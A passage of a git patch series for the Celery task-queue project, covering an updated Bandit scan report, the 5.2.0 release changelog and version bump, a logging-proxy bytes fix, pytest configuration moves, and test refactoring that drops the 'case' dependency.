"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 1280,
+ "line_number": 1278,
"line_range": [
- 1280
+ 1278
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "81 with allow_join_result():\n82 assert ping.delay().get(timeout=ping_task_timeout) == 'pong'\n83 \n",
+ "code": "85 with allow_join_result():\n86 assert ping.delay().get(timeout=ping_task_timeout) == 'pong'\n87 \n",
"filename": "celery/contrib/testing/worker.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 82,
+ "line_number": 86,
"line_range": [
- 82
+ 86
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "104 if perform_ping_check:\n105 assert 'celery.ping' in app.tasks\n106 # Make sure we can connect to the broker\n",
+ "code": "109 if perform_ping_check:\n110 assert 'celery.ping' in app.tasks\n111 # Make sure we can connect to the broker\n",
"filename": "celery/contrib/testing/worker.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Use of assert detected. The enclosed code will be removed when compiling to optimised byte code.",
- "line_number": 105,
+ "line_number": 110,
"line_range": [
- 105
+ 110
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b101_assert_used.html",
"test_id": "B101",
"test_name": "assert_used"
},
{
- "code": "169 return self.win.getkey().upper()\n170 except Exception: # pylint: disable=broad-except\n171 pass\n",
+ "code": "169 return self.win.getkey().upper()\n170 except Exception: # pylint: disable=broad-except\n171 pass\n172 \n",
"filename": "celery/events/cursesmon.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Try, Except, Pass detected.",
"line_number": 170,
"line_range": [
- 170
+ 170,
+ 171
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b110_try_except_pass.html",
"test_id": "B110",
"test_name": "try_except_pass"
},
{
- "code": "481 max_groups = os.sysconf('SC_NGROUPS_MAX')\n482 except Exception: # pylint: disable=broad-except\n483 pass\n",
+ "code": "488 max_groups = os.sysconf('SC_NGROUPS_MAX')\n489 except Exception: # pylint: disable=broad-except\n490 pass\n491 try:\n",
"filename": "celery/platforms.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Try, Except, Pass detected.",
- "line_number": 482,
+ "line_number": 489,
"line_range": [
- 482
+ 489,
+ 490
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b110_try_except_pass.html",
"test_id": "B110",
@@ -2386,84 +2330,86 @@
"test_name": "assert_used"
},
{
- "code": "277 # Tasks are rarely, if ever, created at runtime - exec here is fine.\n278 exec(definition, namespace)\n279 result = namespace[name]\n",
+ "code": "332 # Tasks are rarely, if ever, created at runtime - exec here is fine.\n333 exec(definition, namespace)\n334 result = namespace[name]\n",
"filename": "celery/utils/functional.py",
"issue_confidence": "HIGH",
"issue_severity": "MEDIUM",
"issue_text": "Use of exec detected.",
- "line_number": 278,
+ "line_number": 333,
"line_range": [
- 278
+ 333
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b102_exec_used.html",
"test_id": "B102",
"test_name": "exec_used"
},
{
- "code": "15 try:\n16 import cPickle as pickle\n17 except ImportError:\n",
+ "code": "13 try:\n14 import cPickle as pickle\n15 except ImportError:\n",
"filename": "celery/utils/serialization.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Consider possible security implications associated with cPickle module.",
- "line_number": 16,
+ "line_number": 14,
"line_range": [
- 16
+ 14
],
"more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_imports.html#b403-import-pickle",
"test_id": "B403",
"test_name": "blacklist"
},
{
- "code": "17 except ImportError:\n18 import pickle # noqa\n19 \n",
+ "code": "15 except ImportError:\n16 import pickle\n17 \n",
"filename": "celery/utils/serialization.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Consider possible security implications associated with pickle module.",
- "line_number": 18,
+ "line_number": 16,
"line_range": [
- 18
+ 16
],
"more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_imports.html#b403-import-pickle",
"test_id": "B403",
"test_name": "blacklist"
},
{
- "code": "64 loads(dumps(superexc))\n65 except Exception: # pylint: disable=broad-except\n66 pass\n",
+ "code": "62 loads(dumps(superexc))\n63 except Exception: # pylint: disable=broad-except\n64 pass\n65 else:\n",
"filename": "celery/utils/serialization.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Try, Except, Pass detected.",
- "line_number": 65,
+ "line_number": 63,
"line_range": [
- 65
+ 63,
+ 64
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b110_try_except_pass.html",
"test_id": "B110",
"test_name": "try_except_pass"
},
{
- "code": "158 try:\n159 pickle.loads(pickle.dumps(exc))\n160 except Exception: # pylint: disable=broad-except\n",
+ "code": "156 try:\n157 pickle.loads(pickle.dumps(exc))\n158 except Exception: # pylint: disable=broad-except\n",
"filename": "celery/utils/serialization.py",
"issue_confidence": "HIGH",
"issue_severity": "MEDIUM",
"issue_text": "Pickle and modules that wrap it can be unsafe when used to deserialize untrusted data, possible security issue.",
- "line_number": 159,
+ "line_number": 157,
"line_range": [
- 159
+ 157
],
"more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_calls.html#b301-pickle",
"test_id": "B301",
"test_name": "blacklist"
},
{
- "code": "159 pickle.loads(pickle.dumps(exc))\n160 except Exception: # pylint: disable=broad-except\n161 pass\n",
+ "code": "157 pickle.loads(pickle.dumps(exc))\n158 except Exception: # pylint: disable=broad-except\n159 pass\n160 else:\n",
"filename": "celery/utils/serialization.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Try, Except, Pass detected.",
- "line_number": 160,
+ "line_number": 158,
"line_range": [
- 160
+ 158,
+ 159
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b110_try_except_pass.html",
"test_id": "B110",
@@ -2498,18 +2444,32 @@
"test_name": "assert_used"
},
{
- "code": "335 self.connection.collect()\n336 except Exception: # pylint: disable=broad-except\n337 pass\n",
+ "code": "350 self.connection.collect()\n351 except Exception: # pylint: disable=broad-except\n352 pass\n353 \n",
"filename": "celery/worker/consumer/consumer.py",
"issue_confidence": "HIGH",
"issue_severity": "LOW",
"issue_text": "Try, Except, Pass detected.",
- "line_number": 336,
+ "line_number": 351,
"line_range": [
- 336
+ 351,
+ 352
],
"more_info": "https://bandit.readthedocs.io/en/latest/plugins/b110_try_except_pass.html",
"test_id": "B110",
"test_name": "try_except_pass"
+ },
+ {
+ "code": "7 import platform\n8 import shelve\n9 import sys\n",
+ "filename": "celery/worker/state.py",
+ "issue_confidence": "HIGH",
+ "issue_severity": "LOW",
+ "issue_text": "Consider possible security implications associated with shelve module.",
+ "line_number": 8,
+ "line_range": [
+ 8
+ ],
+ "more_info": "https://bandit.readthedocs.io/en/latest/blacklists/blacklist_imports.html#b403-import-pickle",
+ "test_id": "B403",
+ "test_name": "blacklist"
}
]
-}
\ No newline at end of file
From e35205c965ac661240f8a6676a529dea2e68ea2f Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Mon, 8 Nov 2021 07:10:12 +0600
Subject: [PATCH 117/177] update chnagelog for 5.2.0
---
Changelog.rst | 13 +++++++++++++
1 file changed, 13 insertions(+)
diff --git a/Changelog.rst b/Changelog.rst
index d6853d97359..8c94896c0aa 100644
--- a/Changelog.rst
+++ b/Changelog.rst
@@ -8,6 +8,19 @@ This document contains change notes for bugfix & new features
in the & 5.2.x series, please see :ref:`whatsnew-5.2` for
an overview of what's new in Celery 5.2.
+.. _version-5.2.0:
+
+5.2.0
+=======
+:release-date: 2021-11-08 7.15 A.M UTC+6:00
+:release-by: Asif Saif Uddin
+
+- Prevent from subscribing to empty channels (#7040)
+- fix register_task method.
+- Fire task failure signal on final reject (#6980)
+- Limit pymongo version: <3.12.1 (#7041)
+- Bump min kombu version to 5.2.1
+
.. _version-5.2.0rc2:
5.2.0rc2
From 9c957547a77f581ad7742c2e4f5fb63643ded3e0 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Mon, 8 Nov 2021 07:13:53 +0600
Subject: [PATCH 118/177] =?UTF-8?q?Bump=20version:=205.2.0rc2=20=E2=86=92?=
=?UTF-8?q?=205.2.0?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.bumpversion.cfg | 2 +-
README.rst | 2 +-
celery/__init__.py | 2 +-
docs/includes/introduction.txt | 2 +-
4 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/.bumpversion.cfg b/.bumpversion.cfg
index e30618d431d..c09541dd81c 100644
--- a/.bumpversion.cfg
+++ b/.bumpversion.cfg
@@ -1,5 +1,5 @@
[bumpversion]
-current_version = 5.2.0rc2
+current_version = 5.2.0
commit = True
tag = True
parse = (?P\d+)\.(?P\d+)\.(?P\d+)(?P[a-z\d]+)?
diff --git a/README.rst b/README.rst
index ca8cafaa771..350fc9dcf62 100644
--- a/README.rst
+++ b/README.rst
@@ -2,7 +2,7 @@
|build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge|
-:Version: 5.2.0rc2 (dawn-chorus)
+:Version: 5.2.0 (dawn-chorus)
:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
diff --git a/celery/__init__.py b/celery/__init__.py
index 0d40be901fe..28a7de4f54b 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -17,7 +17,7 @@
SERIES = 'dawn-chorus'
-__version__ = '5.2.0rc2'
+__version__ = '5.2.0'
__author__ = 'Ask Solem'
__contact__ = 'auvipy@gmail.com'
__homepage__ = 'http://celeryproject.org'
diff --git a/docs/includes/introduction.txt b/docs/includes/introduction.txt
index 9ec52bf75db..0b871532542 100644
--- a/docs/includes/introduction.txt
+++ b/docs/includes/introduction.txt
@@ -1,4 +1,4 @@
-:Version: 5.2.0rc2 (cliffs)
+:Version: 5.2.0 (cliffs)
:Web: http://celeryproject.org/
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
From 8521e8af0ac618aff761f84b0ffe00202144271e Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Mon, 8 Nov 2021 16:40:31 +0000
Subject: [PATCH 119/177] [pre-commit.ci] pre-commit autoupdate
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/pycqa/isort: 5.9.3 → 5.10.0](https://github.com/pycqa/isort/compare/5.9.3...5.10.0)
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 5897b1fd242..5c7feb69d33 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -24,6 +24,6 @@ repos:
- id: mixed-line-ending
- repo: https://github.com/pycqa/isort
- rev: 5.9.3
+ rev: 5.10.0
hooks:
- id: isort
From 3ff054e9fdff6252406c7311ca31f03bc32ebaf4 Mon Sep 17 00:00:00 2001
From: Matus Valo
Date: Mon, 8 Nov 2021 21:49:05 +0100
Subject: [PATCH 120/177] Remove unused failing unittest
---
t/distro/test_CI_reqs.py | 35 -----------------------------------
1 file changed, 35 deletions(-)
delete mode 100644 t/distro/test_CI_reqs.py
diff --git a/t/distro/test_CI_reqs.py b/t/distro/test_CI_reqs.py
deleted file mode 100644
index 861e30b905e..00000000000
--- a/t/distro/test_CI_reqs.py
+++ /dev/null
@@ -1,35 +0,0 @@
-import os
-import pprint
-
-import pytest
-
-
-def _get_extras_reqs_from(name):
- try:
- with open(os.path.join('requirements', name)) as fh:
- lines = fh.readlines()
- except OSError:
- pytest.skip('requirements dir missing, not running from dist?')
- else:
- return {
- line.split()[1] for line in lines
- if line.startswith('-r extras/')
- }
-
-
-def _get_all_extras():
- return {
- os.path.join('extras', f)
- for f in os.listdir('requirements/extras/')
- }
-
-
-def test_all_reqs_enabled_in_tests():
- ci_default = _get_extras_reqs_from('test-ci-default.txt')
- ci_base = _get_extras_reqs_from('test-ci-base.txt')
-
- defined = ci_default | ci_base
- all_extras = _get_all_extras()
- diff = all_extras - defined
- print(f'Missing CI reqs:\n{pprint.pformat(diff)}')
- assert not diff
From ff0717d7244cedd0e84162944f6bae2615a49d2d Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 9 Nov 2021 11:56:08 +0600
Subject: [PATCH 121/177] ad toml file path (#7060)
---
.github/workflows/python-package.yml | 2 ++
1 file changed, 2 insertions(+)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index b4076bf6429..6807091169f 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -10,11 +10,13 @@ on:
- '**.py'
- '**.txt'
- '.github/workflows/python-package.yml'
+ - '**.toml'
pull_request:
branches: [ 'master', '5.0' ]
paths:
- '**.py'
- '**.txt'
+ - '**.toml'
- '.github/workflows/python-package.yml'
jobs:
From 9ff86cd5f0b32e0167c8481020c177bd72308ee5 Mon Sep 17 00:00:00 2001
From: Tim Schilling
Date: Mon, 8 Nov 2021 11:15:48 -0600
Subject: [PATCH 122/177] Fix rstrip usage on bytes instance in ProxyLogger.
It's possible for data to be a bytes instance, hence the usage of
safe_str elsewhere in the function. Before mutating the data,
it should be transformed safely into a string. Then we can replace
the new line characters.
---
celery/utils/log.py | 8 ++++----
t/unit/app/test_log.py | 25 +++++++++++++++++++++++++
2 files changed, 29 insertions(+), 4 deletions(-)
diff --git a/celery/utils/log.py b/celery/utils/log.py
index 6fca1226768..668094c5ce5 100644
--- a/celery/utils/log.py
+++ b/celery/utils/log.py
@@ -224,13 +224,13 @@ def write(self, data):
if getattr(self._thread, 'recurse_protection', False):
# Logger is logging back to this file, so stop recursing.
return 0
- data = data.rstrip('\n')
if data and not self.closed:
self._thread.recurse_protection = True
try:
- safe_data = safe_str(data)
- self.logger.log(self.loglevel, safe_data)
- return len(safe_data)
+ safe_data = safe_str(data).rstrip('\n')
+ if safe_data:
+ self.logger.log(self.loglevel, safe_data)
+ return len(safe_data)
finally:
self._thread.recurse_protection = False
return 0
diff --git a/t/unit/app/test_log.py b/t/unit/app/test_log.py
index 37ebe251f66..fea6bf6976a 100644
--- a/t/unit/app/test_log.py
+++ b/t/unit/app/test_log.py
@@ -286,6 +286,31 @@ def test_logging_proxy(self):
p.write('foo')
assert stderr.getvalue()
+ @mock.restore_logging()
+ def test_logging_proxy_bytes(self):
+ logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
+ root=False)
+
+ with mock.wrap_logger(logger) as sio:
+ p = LoggingProxy(logger, loglevel=logging.ERROR)
+ p.close()
+ p.write(b'foo')
+ assert 'foo' not in str(sio.getvalue())
+ p.closed = False
+ p.write(b'\n')
+ assert str(sio.getvalue()) == ''
+ write_res = p.write(b'foo ')
+ assert str(sio.getvalue()) == 'foo \n'
+ assert write_res == 4
+ p.flush()
+ p.close()
+ assert not p.isatty()
+
+ with mock.stdouts() as (stdout, stderr):
+ with in_sighandler():
+ p.write(b'foo')
+ assert stderr.getvalue()
+
@mock.restore_logging()
def test_logging_proxy_recurse_protection(self):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
From 48385bcaf544da75c110de253358ec30fedc7e4f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?J=C3=A9r=C3=B4me=20Lafr=C3=A9choux?=
Date: Mon, 8 Nov 2021 17:57:15 +0100
Subject: [PATCH 123/177] Pass logfile to ExecStop in celery.service example
systemd file
---
docs/userguide/daemonizing.rst | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/docs/userguide/daemonizing.rst b/docs/userguide/daemonizing.rst
index cd46c4e1894..c2ea8a57645 100644
--- a/docs/userguide/daemonizing.rst
+++ b/docs/userguide/daemonizing.rst
@@ -403,7 +403,8 @@ This is an example systemd file:
--pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \
--loglevel="${CELERYD_LOG_LEVEL}" $CELERYD_OPTS'
ExecStop=/bin/sh -c '${CELERY_BIN} multi stopwait $CELERYD_NODES \
- --pidfile=${CELERYD_PID_FILE} --loglevel="${CELERYD_LOG_LEVEL}"'
+ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \
+ --loglevel="${CELERYD_LOG_LEVEL}"'
ExecReload=/bin/sh -c '${CELERY_BIN} -A $CELERY_APP multi restart $CELERYD_NODES \
--pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \
--loglevel="${CELERYD_LOG_LEVEL}" $CELERYD_OPTS'
From 6d4a6f355e2e47d8fd798d79369f47e72e785603 Mon Sep 17 00:00:00 2001
From: Matus Valo
Date: Mon, 8 Nov 2021 21:52:33 +0100
Subject: [PATCH 124/177] Move pytest configuration from setup.cfg to
pyproject.toml
Pytest documentation does not recommend to use setup.cfg as pytest
confguration - see warning here:
https://docs.pytest.org/en/6.2.x/customize.html#setup-cfg
---
pyproject.toml | 6 +++++-
setup.cfg | 6 ------
2 files changed, 5 insertions(+), 7 deletions(-)
diff --git a/pyproject.toml b/pyproject.toml
index 8b137891791..75ee096ea43 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1 +1,5 @@
-
+[tool.pytest.ini_options]
+addopts = "--strict-markers"
+testpaths = "t/unit/"
+python_classes = "test_*"
+xdfail_strict=true
diff --git a/setup.cfg b/setup.cfg
index daa92865f7f..91641248bc2 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -1,9 +1,3 @@
-[tool:pytest]
-addopts = --strict-markers
-testpaths = t/unit/
-python_classes = test_*
-xfail_strict=true
-
[build_sphinx]
source-dir = docs/
build-dir = docs/_build
From 227bc0babc6389d8279254d6081448ee783feb72 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 9 Nov 2021 13:24:48 +0600
Subject: [PATCH 125/177] update readme
---
README.rst | 16 ++++++++--------
1 file changed, 8 insertions(+), 8 deletions(-)
diff --git a/README.rst b/README.rst
index 350fc9dcf62..0075875b468 100644
--- a/README.rst
+++ b/README.rst
@@ -57,13 +57,13 @@ in such a way that the client enqueues an URL to be requested by a worker.
What do I need?
===============
-Celery version 5.2.0rc2 runs on,
+Celery version 5.2.0 runs on,
- Python (3.7, 3.8, 3.9, 3.10)
-- PyPy3.7 (7.3+)
+- PyPy3.7 (7.3.7+)
-This is the next version of celery which will support Python 3.6 or newer.
+This is the version of celery which will support Python 3.7 or newer.
If you're running an older version of Python, you need to be running
an older version of Celery:
@@ -90,7 +90,7 @@ Get Started
===========
If this is the first time you're trying to use Celery, or you're
-new to Celery 5.0.5 or 5.2.0rc2 coming from previous versions then you should read our
+new to Celery v5.2.0 coming from previous versions then you should read our
getting started tutorials:
- `First steps with Celery`_
@@ -258,9 +258,9 @@ separating them by commas.
::
- $ pip install "celery[librabbitmq]"
+ $ pip install "celery[amqp]"
- $ pip install "celery[librabbitmq,redis,auth,msgpack]"
+ $ pip install "celery[amqp,redis,auth,msgpack]"
The following bundles are available:
@@ -288,8 +288,8 @@ Concurrency
Transports and Backends
~~~~~~~~~~~~~~~~~~~~~~~
-:``celery[librabbitmq]``:
- for using the librabbitmq C library.
+:``celery[amqp]``:
+ for using the RabbitMQ amqp python library.
:``celery[redis]``:
for using Redis as a message transport or as a result backend.
From 4918bfb557366931a6a1a4ff5773eb1dd197dc9c Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Wed, 10 Nov 2021 11:10:21 +0600
Subject: [PATCH 126/177] not needed as python 2 is not supported.
---
requirements/pkgutils.txt | 1 -
1 file changed, 1 deletion(-)
diff --git a/requirements/pkgutils.txt b/requirements/pkgutils.txt
index e5653449606..ea4078d78b4 100644
--- a/requirements/pkgutils.txt
+++ b/requirements/pkgutils.txt
@@ -4,7 +4,6 @@ flake8>=3.8.3
flakeplus>=1.1
flake8-docstrings~=1.5
pydocstyle~=5.0; python_version >= '3.0'
-pydocstyle~=3.0; python_version < '3.0'
tox>=3.8.4
sphinx2rst>=1.0
# Disable cyanide until it's fully updated.
From 777748038557e4d72a5d2e4e787aa6faab04ae1f Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Wed, 10 Nov 2021 11:14:05 +0600
Subject: [PATCH 127/177] drop as we don't use travis anymore
---
requirements/test-ci-base.txt | 1 -
1 file changed, 1 deletion(-)
diff --git a/requirements/test-ci-base.txt b/requirements/test-ci-base.txt
index 1fca3a107cb..3563008e5ca 100644
--- a/requirements/test-ci-base.txt
+++ b/requirements/test-ci-base.txt
@@ -1,5 +1,4 @@
pytest-cov
-pytest-travis-fold
codecov
-r extras/redis.txt
-r extras/sqlalchemy.txt
From bb11b1e289de984376650f89253ad43b7b010fec Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Wed, 10 Nov 2021 11:12:18 +0600
Subject: [PATCH 128/177] simplejson is not used anymore
---
requirements/test-integration.txt | 1 -
1 file changed, 1 deletion(-)
diff --git a/requirements/test-integration.txt b/requirements/test-integration.txt
index 1fcda0bd85c..ab2958d21ff 100644
--- a/requirements/test-integration.txt
+++ b/requirements/test-integration.txt
@@ -1,4 +1,3 @@
-simplejson
-r extras/redis.txt
-r extras/azureblockblob.txt
-r extras/auth.txt
From 011dc063719c7bce9c105a8e86095a0ccbf7cb1e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Franti=C5=A1ek=20Zatloukal?=
Date: Wed, 10 Nov 2021 14:49:15 +0100
Subject: [PATCH 129/177] Change pytz>dev to a PEP 440 compliant pytz>0.dev.0
---
requirements/default.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/default.txt b/requirements/default.txt
index c9110a53ef6..b35e5b393e9 100644
--- a/requirements/default.txt
+++ b/requirements/default.txt
@@ -1,4 +1,4 @@
-pytz>dev
+pytz>0.dev.0
billiard>=3.6.4.0,<4.0
kombu>=5.2.1,<6.0
vine>=5.0.0,<6.0
From 26d7a4fa61f6ee36ad23cc3780e09a07eb350e8c Mon Sep 17 00:00:00 2001
From: Matus Valo
Date: Thu, 11 Nov 2021 16:40:05 +0100
Subject: [PATCH 130/177] Remove dependency to case (#7077)
* Remove dependency to case
* [pre-commit.ci] auto fixes from pre-commit.com hooks
for more information, see https://pre-commit.ci
* Minor fixes
* [pre-commit.ci] auto fixes from pre-commit.com hooks
for more information, see https://pre-commit.ci
Co-authored-by: pre-commit-ci[bot] <66853113+pre-commit-ci[bot]@users.noreply.github.com>
---
celery/contrib/testing/mocks.py | 32 +-
pyproject.toml | 1 +
requirements/test.txt | 1 -
t/unit/app/test_app.py | 31 +-
t/unit/app/test_builtins.py | 2 +-
t/unit/app/test_loaders.py | 5 +-
t/unit/app/test_log.py | 56 ++--
t/unit/app/test_schedules.py | 4 +-
t/unit/backends/test_cache.py | 76 ++---
t/unit/backends/test_cassandra.py | 17 +-
t/unit/backends/test_mongodb.py | 4 +-
t/unit/backends/test_redis.py | 9 +-
t/unit/concurrency/test_prefork.py | 85 +++--
t/unit/conftest.py | 477 +++++++++++++++++++++++++++-
t/unit/contrib/test_migrate.py | 4 +-
t/unit/events/test_snapshot.py | 4 +-
t/unit/fixups/test_django.py | 42 ++-
t/unit/security/test_certificate.py | 4 +-
t/unit/security/test_security.py | 4 +-
t/unit/tasks/test_tasks.py | 2 +-
t/unit/utils/test_platforms.py | 26 +-
t/unit/utils/test_serialization.py | 11 +-
t/unit/utils/test_threads.py | 4 +-
t/unit/worker/test_autoscale.py | 10 +-
t/unit/worker/test_consumer.py | 2 +-
t/unit/worker/test_worker.py | 9 +-
26 files changed, 702 insertions(+), 220 deletions(-)
diff --git a/celery/contrib/testing/mocks.py b/celery/contrib/testing/mocks.py
index 82775011afc..a7c00d4d033 100644
--- a/celery/contrib/testing/mocks.py
+++ b/celery/contrib/testing/mocks.py
@@ -2,15 +2,11 @@
import numbers
from datetime import datetime, timedelta
from typing import Any, Mapping, Sequence
+from unittest.mock import Mock
from celery import Celery
from celery.canvas import Signature
-try:
- from case import Mock
-except ImportError:
- from unittest.mock import Mock
-
def TaskMessage(
name, # type: str
@@ -113,3 +109,29 @@ def task_message_from_sig(app, sig, utc=True, TaskMessage=TaskMessage):
utc=utc,
**sig.options
)
+
+
+class _ContextMock(Mock):
+ """Dummy class implementing __enter__ and __exit__.
+
+ The :keyword:`with` statement requires these to be implemented
+ in the class, not just the instance.
+ """
+
+ def __enter__(self):
+ return self
+
+ def __exit__(self, *exc_info):
+ pass
+
+
+def ContextMock(*args, **kwargs):
+ """Mock that mocks :keyword:`with` statement contexts."""
+ obj = _ContextMock(*args, **kwargs)
+ obj.attach_mock(_ContextMock(), '__enter__')
+ obj.attach_mock(_ContextMock(), '__exit__')
+ obj.__enter__.return_value = obj
+ # if __exit__ return a value the exception is ignored,
+ # so it must return None here.
+ obj.__exit__.return_value = None
+ return obj
diff --git a/pyproject.toml b/pyproject.toml
index 75ee096ea43..8ff14c4766b 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -3,3 +3,4 @@ addopts = "--strict-markers"
testpaths = "t/unit/"
python_classes = "test_*"
xdfail_strict=true
+markers = ["sleepdeprived_patched_module", "masked_modules", "patched_environ", "patched_module"]
diff --git a/requirements/test.txt b/requirements/test.txt
index 0dd666f70bf..90c84b1996e 100644
--- a/requirements/test.txt
+++ b/requirements/test.txt
@@ -1,4 +1,3 @@
-case>=1.3.1
pytest~=6.2
pytest-celery
pytest-subtests
diff --git a/t/unit/app/test_app.py b/t/unit/app/test_app.py
index 215e200dd45..ed61b0f8356 100644
--- a/t/unit/app/test_app.py
+++ b/t/unit/app/test_app.py
@@ -9,7 +9,6 @@
from unittest.mock import Mock, patch
import pytest
-from case import ContextMock, mock
from vine import promise
from celery import Celery, _state
@@ -18,6 +17,7 @@
from celery.app import base as _appbase
from celery.app import defaults
from celery.backends.base import Backend
+from celery.contrib.testing.mocks import ContextMock
from celery.exceptions import ImproperlyConfigured
from celery.loaders.base import unconfigured
from celery.platforms import pyimplementation
@@ -25,6 +25,7 @@
from celery.utils.objects import Bunch
from celery.utils.serialization import pickle
from celery.utils.time import localize, timezone, to_utc
+from t.unit import conftest
THIS_IS_A_KEY = 'this is a value'
@@ -915,10 +916,10 @@ def add(x, y):
assert 'add1' in self.app.conf.beat_schedule
assert 'add2' in self.app.conf.beat_schedule
- def test_pool_no_multiprocessing(self):
- with mock.mask_modules('multiprocessing.util'):
- pool = self.app.pool
- assert pool is self.app._pool
+ @pytest.mark.masked_modules('multiprocessing.util')
+ def test_pool_no_multiprocessing(self, mask_modules):
+ pool = self.app.pool
+ assert pool is self.app._pool
def test_bugreport(self):
assert self.app.bugreport()
@@ -1078,26 +1079,26 @@ def test_enable_disable_trace(self):
class test_pyimplementation:
def test_platform_python_implementation(self):
- with mock.platform_pyimp(lambda: 'Xython'):
+ with conftest.platform_pyimp(lambda: 'Xython'):
assert pyimplementation() == 'Xython'
def test_platform_jython(self):
- with mock.platform_pyimp():
- with mock.sys_platform('java 1.6.51'):
+ with conftest.platform_pyimp():
+ with conftest.sys_platform('java 1.6.51'):
assert 'Jython' in pyimplementation()
def test_platform_pypy(self):
- with mock.platform_pyimp():
- with mock.sys_platform('darwin'):
- with mock.pypy_version((1, 4, 3)):
+ with conftest.platform_pyimp():
+ with conftest.sys_platform('darwin'):
+ with conftest.pypy_version((1, 4, 3)):
assert 'PyPy' in pyimplementation()
- with mock.pypy_version((1, 4, 3, 'a4')):
+ with conftest.pypy_version((1, 4, 3, 'a4')):
assert 'PyPy' in pyimplementation()
def test_platform_fallback(self):
- with mock.platform_pyimp():
- with mock.sys_platform('darwin'):
- with mock.pypy_version():
+ with conftest.platform_pyimp():
+ with conftest.sys_platform('darwin'):
+ with conftest.pypy_version():
assert 'CPython' == pyimplementation()
diff --git a/t/unit/app/test_builtins.py b/t/unit/app/test_builtins.py
index 080999f7bc5..dcbec4b201b 100644
--- a/t/unit/app/test_builtins.py
+++ b/t/unit/app/test_builtins.py
@@ -1,10 +1,10 @@
from unittest.mock import Mock, patch
import pytest
-from case import ContextMock
from celery import chord, group
from celery.app import builtins
+from celery.contrib.testing.mocks import ContextMock
from celery.utils.functional import pass1
diff --git a/t/unit/app/test_loaders.py b/t/unit/app/test_loaders.py
index 9a411e963a4..09c8a6fe775 100644
--- a/t/unit/app/test_loaders.py
+++ b/t/unit/app/test_loaders.py
@@ -4,7 +4,6 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from celery import loaders
from celery.exceptions import NotConfigured
@@ -120,8 +119,8 @@ def test_read_configuration_not_a_package(self, find_module):
l.read_configuration(fail_silently=False)
@patch('celery.loaders.base.find_module')
- @mock.environ('CELERY_CONFIG_MODULE', 'celeryconfig.py')
- def test_read_configuration_py_in_name(self, find_module):
+ @pytest.mark.patched_environ('CELERY_CONFIG_MODULE', 'celeryconfig.py')
+ def test_read_configuration_py_in_name(self, find_module, environ):
find_module.side_effect = NotAPackage()
l = default.Loader(app=self.app)
with pytest.raises(NotAPackage):
diff --git a/t/unit/app/test_log.py b/t/unit/app/test_log.py
index fea6bf6976a..32440862bd2 100644
--- a/t/unit/app/test_log.py
+++ b/t/unit/app/test_log.py
@@ -6,8 +6,6 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
